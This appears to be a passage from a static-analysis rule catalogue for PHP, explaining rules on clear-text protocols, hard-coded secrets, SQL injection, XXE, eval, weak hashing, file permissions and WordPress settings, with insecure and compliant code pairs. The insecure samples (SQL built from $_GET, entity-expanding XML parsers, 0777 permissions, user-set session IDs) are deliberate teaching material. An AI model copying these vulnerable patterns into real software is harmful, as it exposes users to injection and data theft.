  ini_set('error_log', "path/to/logfile"); // Sensitive - check logfile is secure
  ini_set('error_reporting', E_PARSE ); // Sensitive
  ini_set('error_reporting', 64); // Sensitive
  ini_set('log_errors', '0'); // Sensitive
  ini_set('log_errors_max_length', '512'); // Sensitive
  ini_set('ignore_repeated_errors', '1'); // Sensitive
  ini_set('ignore_repeated_source', '1'); // Sensitive
  ini_set('track_errors', '0'); // Sensitive

  ini_alter('docref_root', '1'); // Sensitive
  ini_alter('display_errors', '1'); // Sensitive
  ini_alter('display_startup_errors', '1'); // Sensitive
  ini_alter('error_log', "path/to/logfile"); // Sensitive - check logfile is secure
  ini_alter('error_reporting', E_PARSE ); // Sensitive
  ini_alter('error_reporting', 64); // Sensitive
  ini_alter('log_errors', '0'); // Sensitive
  ini_alter('log_errors_max_length', '512'); // Sensitive
  ini_alter('ignore_repeated_errors', '1'); // Sensitive
  ini_alter('ignore_repeated_source', '1'); // Sensitive
  ini_alter('track_errors', '0'); // Sensitive
}

Definition of custom loggers with psr/log

abstract class MyLogger implements \Psr\Log\LoggerInterface { // Sensitive
    // ...
}

abstract class MyLogger2 extends \Psr\Log\AbstractLogger { // Sensitive
    // ...
}

abstract class MyLogger3 {
    use \Psr\Log\LoggerTrait; // Sensitive
    // ...
}

Exceptions

No issue will be raised for logger configuration when it follows recommended settings for production servers. The following examples are all valid:

  ini_set('docref_root', '0');
  ini_set('display_errors', '0');
  ini_set('display_startup_errors', '0');

  error_reporting(0);
  ini_set('error_reporting', 0);

  ini_set('log_errors', '1');
  ini_set('log_errors_max_length', '0');
  ini_set('ignore_repeated_errors', '0');
  ini_set('ignore_repeated_source', '0');
  ini_set('track_errors', '1');

See

php:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances that attackers successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

$url = "http://example.com"; // Sensitive
$url = "ftp://anonymous@example.com"; // Sensitive
$url = "telnet://anonymous@example.com"; // Sensitive

$con = ftp_connect('example.com'); // Sensitive

$trans = (new Swift_SmtpTransport('XXX', 1234)); // Sensitive

$mailer = new PHPMailer(true); // Sensitive

define( 'FORCE_SSL_ADMIN', false); // Sensitive
define( 'FORCE_SSL_LOGIN', false); // Sensitive

Compliant Solution

$url = "https://example.com";
$url = "sftp://anonymous@example.com";
$url = "ssh://anonymous@example.com";

$con = ftp_ssl_connect('example.com');

$trans = (new Swift_SmtpTransport('smtp.example.org', 1234))
  ->setEncryption('tls')
;

$mailer = new PHPMailer(true);
$mailer->SMTPSecure = 'tls';

define( 'FORCE_SSL_ADMIN', true);
define( 'FORCE_SSL_LOGIN', true);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

php:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

$password = "65DBGgwe4uazdWQA"; // Sensitive

$httpUrl = "https://example.domain?user=user&password=65DBGgwe4uazdWQA"; // Sensitive
$sshUrl = "ssh://user:65DBGgwe4uazdWQA@example.domain"; // Sensitive

Compliant Solution

$user = getUser();
$password = getPassword(); // Compliant

$httpUrl = "https://example.domain?user=$user&password=$password"; // Compliant
$sshUrl = "ssh://$user:$password@example.domain"; // Compliant
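The getUser() and getPassword() helpers above are left undefined by the rule; one possible implementation (an assumption, shown for illustration) reads the credentials from environment variables so that nothing secret is committed to the repository:

```php
<?php
// Hypothetical implementations of the helpers used above: credentials come
// from the environment (e.g. populated by the deployment tooling or a
// secrets manager), never from the source code.
function getUser(): string {
    $user = getenv('DB_USER');
    if ($user === false || $user === '') {
        throw new RuntimeException('DB_USER is not set');
    }
    return $user;
}

function getPassword(): string {
    $password = getenv('DB_PASSWORD');
    if ($password === false || $password === '') {
        throw new RuntimeException('DB_PASSWORD is not set');
    }
    return $password;
}
```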

See

php:S5693

Rejecting requests with significant content length is a good practice to control network traffic intensity and thus resource consumption, in order to prevent DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • 8 MB or less for file uploads.
    • 2 MB or less for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.
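In plain PHP, the limits above can be enforced early by checking the declared Content-Length before processing the request body. This is a minimal sketch (the function and constant names are assumptions) that complements the server-level post_max_size and upload_max_filesize directives in php.ini:

```php
<?php
// Limits follow the recommendation above; adjust them to your application.
const MAX_UPLOAD_BYTES  = 8 * 1024 * 1024; // 8 MB for file uploads
const MAX_REQUEST_BYTES = 2 * 1024 * 1024; // 2 MB for other requests

// Returns true when the declared request size exceeds the applicable limit.
function request_too_large(array $server, bool $isUpload): bool {
    $limit  = $isUpload ? MAX_UPLOAD_BYTES : MAX_REQUEST_BYTES;
    $length = (int) ($server['CONTENT_LENGTH'] ?? 0);
    return $length > $limit;
}

if (request_too_large($_SERVER, false)) {
    http_response_code(413); // 413 Payload Too Large
    exit;
}
```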

Sensitive Code Example

For Symfony Constraints:

use Symfony\Component\Validator\Constraints as Assert;
use Symfony\Component\Validator\Mapping\ClassMetadata;

class TestEntity
{
    public static function loadValidatorMetadata(ClassMetadata $metadata)
    {
        $metadata->addPropertyConstraint('upload', new Assert\File([
            'maxSize' => '100M', // Sensitive
        ]));
    }
}

For Laravel Validator:

use App\Http\Controllers\Controller;
use Illuminate\Http\Request;

class TestController extends Controller
{
    public function test(Request $request)
    {
        $validatedData = $request->validate([
            'upload' => 'required|file', // Sensitive
        ]);
    }
}

Compliant Solution

For Symfony Constraints:

use Symfony\Component\Validator\Constraints as Assert;
use Symfony\Component\Validator\Mapping\ClassMetadata;

class TestEntity
{
    public static function loadValidatorMetadata(ClassMetadata $metadata)
    {
        $metadata->addPropertyConstraint('upload', new Assert\File([
            'maxSize' => '8M', // Compliant
        ]));
    }
}

For Laravel Validator:

use App\Http\Controllers\Controller;
use Illuminate\Http\Request;

class TestController extends Controller
{
    public function test(Request $request)
    {
        $validatedData = $request->validate([
            'upload' => 'required|file|max:8000', // Compliant
        ]);
    }
}

See

php:S6437

Why is this an issue?

A hard-coded secret has been found in your code. You should quickly list where this secret is used, revoke it, and then change it in every system that uses it.

Passwords, secrets, and any type of credentials should only be used to authenticate a single entity (a person or a system).

If you allow third parties to authenticate as another system or person, they can impersonate legitimate identities and undermine trust within the organization.
It does not matter if the impersonation is malicious: In either case, it is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

Keeping credentials in plain text in a code base is tantamount to sharing that password with anyone who has access to the source code and runtime servers.
Thus, it is a breach of trust, as these individuals have the ability to impersonate others.

Secret management services are the most efficient tools to store credentials and protect the identities associated with them.
Cloud providers and on-premise services can be used for this purpose.

If storing credentials in a secret data management service is not possible, follow these guidelines:

  • Do not store credentials in a file that an excessive number of people can access.
    • For example, not in code, not in a spreadsheet, not on a sticky note, and not on a shared drive.
  • Use the production operating system to protect password access control.
    • For example, in a file whose permissions are restricted and protected with chmod and chown.
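The file-based fallback described above might look like this in PHP. The helper name is an assumption, and the secret file is expected to be owned by the service account with restricted permissions (e.g. chmod 600):

```php
<?php
// Reads a secret from a file that lives outside the code base, e.g.
// /etc/myapp/db_password (a placeholder path), restricted with
// chmod 600 and chown to the application user.
function loadSecret(string $path): string {
    $secret = file_get_contents($path);
    if ($secret === false) {
        throw new RuntimeException("Cannot read secret file: $path");
    }
    return trim($secret); // drop the trailing newline most editors add
}
```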

Noncompliant code example

use Defuse\Crypto\KeyOrPassword;

function createKey() {
    $password = "example";
    return KeyOrPassword::createFromPassword($password); // Noncompliant
}

Compliant solution

Modern web frameworks tend to provide a secure way to pass passwords and secrets to the code. For example, in Symfony you can use vaults to store your secrets. The secret values are referenced in the same way as environment variables, so you can easily access them through configuration parameters.

use Defuse\Crypto\KeyOrPassword;

class PasswordService
{
    private string $password;

    public function setPassword(string $password): void
    {
        $this->password = $password;
    }

    public function createKey(): KeyOrPassword
    {
        return KeyOrPassword::createFromPassword($this->password);
    }
}

Resources

php:S2077

Formatted SQL queries can be difficult to maintain and debug, and concatenating untrusted values into them increases the risk of SQL injection. However, this rule doesn’t detect SQL injections (unlike rule S3649); its goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

$id = $_GET['id'];
mysql_connect('localhost', $username, $password) or die('Could not connect: ' . mysql_error());
mysql_select_db('myDatabase') or die('Could not select database');

$result = mysql_query("SELECT * FROM myTable WHERE id = " . $id);  // Sensitive, could be susceptible to SQL injection

while ($row = mysql_fetch_object($result)) {
    echo $row->name;
}

Compliant Solution

$id = $_GET['id'];
try {
    $conn = new PDO('mysql:host=localhost;dbname=myDatabase', $username, $password);
    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

    $stmt = $conn->prepare('SELECT * FROM myTable WHERE id = :id');
    $stmt->execute(array('id' => $id));

    while($row = $stmt->fetch(PDO::FETCH_OBJ)) {
        echo $row->name;
    }
} catch(PDOException $e) {
    echo 'ERROR: ' . $e->getMessage();
}

Exceptions

No issue will be raised if one of the functions is called with a hard-coded string (no concatenation) and this string does not contain a "$" sign.

$result = mysql_query("SELECT * FROM myTable WHERE id = 42") or die('Query failed: ' . mysql_error());  // Compliant

The current implementation does not track variables. It will only detect SQL queries which are concatenated or contain a $ sign directly in the function call.

$query = "SELECT * FROM myTable WHERE id = " . $id;
$result = mysql_query($query);  // No issue will be raised even if it is Sensitive

See

php:S4818

This rule is deprecated, and will eventually be removed.

Using sockets is security-sensitive. It has led in the past to the following vulnerabilities:

Sockets are vulnerable in multiple ways:

  • They enable software to interact with the outside world. As this world is full of attackers, it is necessary to check that they cannot receive sensitive information or inject dangerous input.
  • The number of sockets is limited and can be exhausted, which makes the application unresponsive to users who need additional sockets.

This rule flags code that creates sockets. It matches only the direct use of sockets, not their use through frameworks or high-level APIs such as HTTP connections.

Ask Yourself Whether

  • sockets are created without any limit every time a user performs an action.
  • input received from sockets is used without being sanitized.
  • sensitive data is sent via sockets without being encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In many cases there is no need to open a socket yourself. Use libraries and existing protocols instead.
  • Encrypt all data sent if it is sensitive. Usually it is better to encrypt it even if the data is not sensitive as it might change later.
  • Sanitize any input read from the socket.
  • Limit the number of sockets a given user can create. Close the sockets as soon as possible.
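As a sketch of the encryption advice above, PHP's stream wrappers can carry TLS directly, so a raw socket is often unnecessary. The host and port below are placeholders:

```php
<?php
// Opens a TLS-encrypted connection instead of a raw TCP socket. The tls://
// wrapper performs the handshake, and the context options enforce
// certificate and host-name verification.
function open_encrypted_connection(string $host, int $port)
{
    $context = stream_context_create([
        'ssl' => [
            'verify_peer'      => true,
            'verify_peer_name' => true,
        ],
    ]);

    $fp = stream_socket_client(
        "tls://$host:$port", $errno, $errstr, 10,
        STREAM_CLIENT_CONNECT, $context
    );
    if ($fp === false) {
        throw new RuntimeException("Connection failed: $errstr ($errno)");
    }
    return $fp;
}
```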

Sensitive Code Example

function handle_sockets($domain, $type, $protocol, $port, $backlog, $addr, $hostname, $local_socket, $remote_socket, $fd) {
    socket_create($domain, $type, $protocol); // Sensitive
    socket_create_listen($port, $backlog); // Sensitive
    socket_addrinfo_bind($addr); // Sensitive
    socket_addrinfo_connect($addr); // Sensitive
    socket_create_pair($domain, $type, $protocol, $fd);

    fsockopen($hostname); // Sensitive
    pfsockopen($hostname); // Sensitive
    stream_socket_server($local_socket); // Sensitive
    stream_socket_client($remote_socket); // Sensitive
    stream_socket_pair($domain, $type, $protocol); // Sensitive
}

See

php:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Core PHP

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

$xml = file_get_contents('xxe.xml');
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT); // Noncompliant
$doc = new DOMDocument();
$doc->load('xxe.xml', LIBXML_NOENT); // Noncompliant
$reader = new XMLReader();
$reader->open('xxe.xml');
$reader->setParserProperty(XMLReader::SUBST_ENTITIES, true); // Noncompliant

Compliant solution

External entity substitution is disabled by default in simplexml_load_string() and DOMDocument::load().

$xml = file_get_contents('xxe.xml');
$doc = simplexml_load_string($xml, 'SimpleXMLElement');
$doc = new DOMDocument();
$doc->load('xxe.xml');
$reader = new XMLReader();
$reader->open('xxe.xml');
$reader->setParserProperty(XMLReader::SUBST_ENTITIES, false);

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.
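As a sketch of this whitelisting approach, core PHP exposes libxml_set_external_entity_loader(), which lets you decide per entity whether libxml may resolve it. The allowed URL below is a placeholder:

```php
<?php
// Only entities whose system ID is on an explicit allow-list are resolved;
// everything else is rejected by returning null.
libxml_set_external_entity_loader(
    function (?string $publicId, string $systemId, array $context) {
        $allowed = ['https://example.com/schema/trusted.dtd'];
        if (in_array($systemId, $allowed, true)) {
            return $systemId; // let libxml fetch the trusted resource
        }
        return null; // block all other external entities
    }
);
```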

Resources

Standards

php:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the colliding value gives an attacker the same access as the originally-hashed value. This also applies to the other message-digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

$password = ...

if (md5($password) === '1f3870be274f6c49b3e31a0c6728957f') { // Noncompliant; md5() hashing algorithm is not secure for password management
   [...]
}

if (sha1($password) === 'd0be2dc421be4fcd0172e5afceea3970e2f3d940') { // Noncompliant; sha1() hashing algorithm is not secure for password management
   [...]
}
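A sketch of the safer alternatives mentioned above: SHA-256 for integrity digests, and PHP's dedicated password API for credentials, which applies a slow, salted algorithm (bcrypt with PASSWORD_DEFAULT):

```php
<?php
// Integrity digest with SHA-256 instead of md5()/sha1().
$digest = hash('sha256', 'file contents');

// For passwords, use the dedicated API: password_hash() applies a per-hash
// random salt, and password_verify() compares in constant time.
$stored = password_hash('S3cr3t!', PASSWORD_DEFAULT);
var_dump(password_verify('S3cr3t!', $stored)); // bool(true)
```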

Resources

php:S2964

This rule is deprecated, and will eventually be removed.

Why is this an issue?

sleep is sometimes used in a mistaken attempt to prevent Denial of Service (DoS) attacks by throttling the response rate. But because it ties up a thread, each request takes longer to serve than it otherwise would, making the application more vulnerable to DoS attacks, rather than less.

Noncompliant code example

if (is_bad_ip($requester)) {
  sleep(5);  // Noncompliant
}

Resources

php:S5328

If a session ID can be guessed (not generated with a secure pseudo random generator, or with insufficient length …​) an attacker may be able to hijack another user’s session.

Ask Yourself Whether

  • the session ID is not unique.
  • the session ID is set from a user-controlled input.
  • the session ID is generated with an insecure pseudo-random generator.
  • the session ID length is too short.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Don’t manually generate session IDs; use the language’s built-in functionality instead.

Sensitive Code Example

session_id(bin2hex(random_bytes(4))); // Sensitive: 4 bytes is too short
session_id($_POST["session_id"]); // Sensitive: session ID can be specified by the user

Compliant Solution

session_regenerate_id(); // Compliant
session_id(bin2hex(random_bytes(16))); // Compliant

See

php:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

chmod("foo", 0777); // Sensitive
umask(0); // Sensitive
umask(0750); // Sensitive

For Symfony Filesystem:

use Symfony\Component\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0777); // Sensitive

For Laravel Filesystem:

use Illuminate\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0777); // Sensitive

Compliant Solution

chmod("foo", 0750); // Compliant
umask(0027); // Compliant

For Symfony Filesystem:

use Symfony\Component\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0750); // Compliant

For Laravel Filesystem:

use Illuminate\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0750); // Compliant

See

php:S1523

Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However, most of the time their use is frowned upon because they also increase the risk of Injected Code. Such attacks can either run on the server or in the client (example: XSS attack) and have a huge impact on an application’s security.

This rule marks for review each occurrence of the eval function. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (example: Security Managers in Java, iframes and the same-origin policy for JavaScript in a web browser).

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.
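Where dynamic behavior is genuinely needed, a dispatch table of hard-coded operations is a safer substitute for eval. This is a minimal sketch; the operation names are illustrative:

```php
<?php
// Replace eval() on user input with a dispatch table of hard-coded
// operations: only whitelisted keys can ever run.
$operations = [
    'uppercase' => fn(string $s) => strtoupper($s),
    'reverse'   => fn(string $s) => strrev($s),
];

function run(array $ops, string $name, string $arg): string {
    if (!isset($ops[$name])) {
        throw new InvalidArgumentException("Unknown operation: $name");
    }
    return $ops[$name]($arg);
}

echo run($operations, 'uppercase', 'hello'); // HELLO
```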

Sensitive Code Example

eval($code_to_be_dynamically_executed);

See

php:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' password-and-salt pairs might be low, depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using a longer, cryptographically secure salt should be preferred.

How to fix it in Core PHP

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

$salt = 'salty';
$hash = hash_pbkdf2('sha256', $password, $salt, 100000); // Noncompliant

Compliant solution

$salt = random_bytes(16);
$hash = hash_pbkdf2('sha256', $password, $salt, 100000);

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the random_bytes function with a length parameter set to 16. This one internally uses a cryptographically secure pseudo random number generator.
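For password storage specifically, PHP's password_hash() removes the need to manage salts at all: it generates a unique, cryptographically secure salt on every call and embeds it in the returned hash string.

```php
<?php
// Two hashes of the same password differ because each call draws a fresh
// random salt; password_verify() reads the salt back out of the stored hash.
$h1 = password_hash('correct horse', PASSWORD_DEFAULT);
$h2 = password_hash('correct horse', PASSWORD_DEFAULT);

var_dump($h1 !== $h2);                           // bool(true): unique salts
var_dump(password_verify('correct horse', $h1)); // bool(true)
```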

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
php:S6348

By default, the WordPress administrator and editor roles can add unfiltered HTML content in various places, such as post content. This includes the capability to add JavaScript code.

If an account with such a role gets hijacked, this capability can be used to plant malicious JavaScript code that gets executed whenever somebody visits the website.

Ask Yourself Whether

  • You really need the possibility to add unfiltered HTML with editor or administrator roles.
  • There’s a chance that the accounts of authorized users get compromised.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The unfiltered_html capability should be granted only to trusted roles that need to use markup when publishing dynamic content to the WordPress website. If this capability is not required for all users, including the administrator and editor roles, then it’s recommended to set DISALLOW_UNFILTERED_HTML to true.

Sensitive Code Example

define( 'DISALLOW_UNFILTERED_HTML', false ); // Sensitive

Compliant Solution

define( 'DISALLOW_UNFILTERED_HTML', true );

See

php:S6345

External requests initiated by a WordPress server should be considered security-sensitive. They may contain sensitive data which is stored in the files or in the database of the server. It’s important for the administrator of a WordPress server to understand what they contain and to which server they are sent.

WordPress makes it possible to block external requests by setting the WP_HTTP_BLOCK_EXTERNAL option to true. It’s then possible to authorize requests to only a few servers using another option named WP_ACCESSIBLE_HOSTS.

Ask Yourself Whether

  • Your WordPress website contains code which may call external requests to servers you don’t know.
  • Your WordPress website may send sensitive data to other servers.
  • Your WordPress website uses a lot of plugins or themes.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Uninstall WordPress plugins which send requests to servers you don’t know.
  • Make sure that WP_HTTP_BLOCK_EXTERNAL is defined in wp-config.php.
  • Make sure that WP_HTTP_BLOCK_EXTERNAL is set to true.
  • Make sure that WP_ACCESSIBLE_HOSTS is configured to authorize requests to the servers you trust.

Sensitive Code Example

define( 'WP_HTTP_BLOCK_EXTERNAL', false ); // Sensitive

Compliant Solution

define( 'WP_HTTP_BLOCK_EXTERNAL', true );
define( 'WP_ACCESSIBLE_HOSTS', 'api.wordpress.org' );

See

php:S6346

WordPress has a database repair and optimization mode that can be activated by setting WP_ALLOW_REPAIR to true in the configuration.

If activated, the repair page can be accessed by any user, authenticated or not. This makes sense because if the database is corrupted, the authentication mechanism might not work.

Malicious users could repeatedly trigger this potentially costly operation, slowing down the website and making it unavailable.

Ask Yourself Whether

  • The database is not currently corrupted.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable automatic database repair mode only in case of database corruption. This feature should be deactivated again when the database issue is resolved.

Sensitive Code Example

define( 'WP_ALLOW_REPAIR', true ); // Sensitive

Compliant Solution

// The default value is false, so the value does not have to be explicitly set.
define( 'WP_ALLOW_REPAIR', false );

See

php:S6341

WordPress makes it possible to edit theme and plugin files directly in the Administration Screens. While it may look like an easy way to customize a theme or do a quick change, it’s a dangerous feature. When visiting the theme or plugin editor for the first time, WordPress displays a warning to make it clear that using such a feature may break the website by mistake. More importantly, users who have access to this feature can trigger the execution of any PHP code and may therefore take full control of the WordPress instance. This security risk could be exploited by an attacker who manages to get access to one of the authorized users. Setting the DISALLOW_FILE_EDIT option to true in wp-config.php disables this risky feature. The default value is false.

Ask Yourself Whether

  • You really need to use the theme and plugin editors.
  • The theme and plugin editors are available to users who cannot be fully trusted.
  • There’s a chance that the accounts of authorized users get compromised.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Modify the theme and plugin files using a local editor and deploy them to the server in a secure way.
  • Make sure that DISALLOW_FILE_EDIT is defined in wp-config.php.
  • Make sure that DISALLOW_FILE_EDIT is set to true.

Sensitive Code Example

define( 'DISALLOW_FILE_EDIT', false ); // Sensitive

Compliant Solution

define( 'DISALLOW_FILE_EDIT', true );

See

php:S6343

Automatic updates are a great way of making sure your application gets security updates as soon as they are available. Once a vendor releases a security update, it is crucial to apply it in a timely manner before malicious actors exploit the vulnerability. Relying on manual updates is usually too late, especially if the application is publicly accessible on the internet.

Ask Yourself Whether

  • there is no specific reason for deactivating all automatic updates.
  • you meant to deactivate only automatic major updates.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Don’t deactivate automatic updates unless you have a good reason to do so. This way, you’ll be sure to receive security updates as soon as they are available. If you are worried about an automatic update breaking something, check if it is possible to only activate automatic updates for minor or security updates.

Sensitive Code Example

define( 'WP_AUTO_UPDATE_CORE', false ); // Sensitive
define( 'AUTOMATIC_UPDATER_DISABLED', true ); // Sensitive

Compliant Solution

define( 'WP_AUTO_UPDATE_CORE', true ); // Minor and major automatic updates enabled
define( 'WP_AUTO_UPDATE_CORE', 'minor' ); // Only minor updates are enabled
define( 'AUTOMATIC_UPDATER_DISABLED', false );

See

php:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

